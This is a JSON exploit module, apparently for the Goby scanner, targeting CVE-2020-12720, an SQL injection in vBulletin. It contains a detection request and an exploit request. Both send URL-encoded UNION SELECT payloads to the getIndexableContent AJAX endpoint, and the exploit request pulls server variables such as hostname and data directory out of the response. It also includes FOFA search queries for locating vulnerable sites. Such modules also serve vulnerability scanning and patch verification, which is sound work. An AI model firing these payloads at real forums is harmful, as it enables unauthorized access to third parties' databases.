{
  "Name": "vBulletin SQLi (CVE-2020-12720)",
  "Description": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.",
  "Product": "vBulletin",
  "Homepage": "https://www.vbulletin.com/",
  "DisclosureDate": "2020-05-07",
  "Author": "itardc@163.com",
  "FofaQuery": "app=vBulletin",
  "GobyQuery": "app=vBulletin",
  "Level": "3",
  "Impact": "",
  "Recommendation": "",
  "References": [
    "http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html",
    "http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html",
    "https://attackerkb.com/topics/RSDAFLik92/cve-2020-12720-vbulletin-incorrect-access-control",
    "https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1",
    "https://nvd.nist.gov/vuln/detail/CVE-2020-12720",
    "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12720"
  ],
  "HasExp": true,
  "ExpParams": [
    {
      "name": "SystemVar",
      "type": "createSelect",
      "value": "version,hostname,datadir,basedir",
      "show": ""
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "data": "nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-",
        "data_type": "text",
        "follow_redirect": false,
        "header": {
          "Content-Type": "application/x-www-form-urlencoded",
          "X-Requested-With": "XMLHttpRequest"
        },
        "method": "POST",
        "uri": "/ajax/api/content_infraction/getIndexableContent"
      },
      "ResponseTest": {
        "checks": [
          {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "vbulletinrce",
            "variable": "$body"
          }
        ],
        "operation": "AND",
        "type": "group"
      }
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "data": "nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40{{{SystemVar}}}%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-",
        "data_type": "text",
        "follow_redirect": false,
        "header": {
          "Content-Type": "application/x-www-form-urlencoded",
          "X-Requested-With": "XMLHttpRequest"
        },
        "method": "POST",
        "uri": "/ajax/api/content_infraction/getIndexableContent"
      },
      "SetVariable": [
        "output|lastbody|regex|vbulletinrce(.+?)\""
      ]
    }
  ],
  "Tags": ["sqli"],
  "CVEIDs": [
    "CVE-2020-12720"
  ],
  "CVSSScore": "9.8",
  "AttackSurfaces": {
    "Application": ["vBulletin"],
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  },
  "Disable": false
}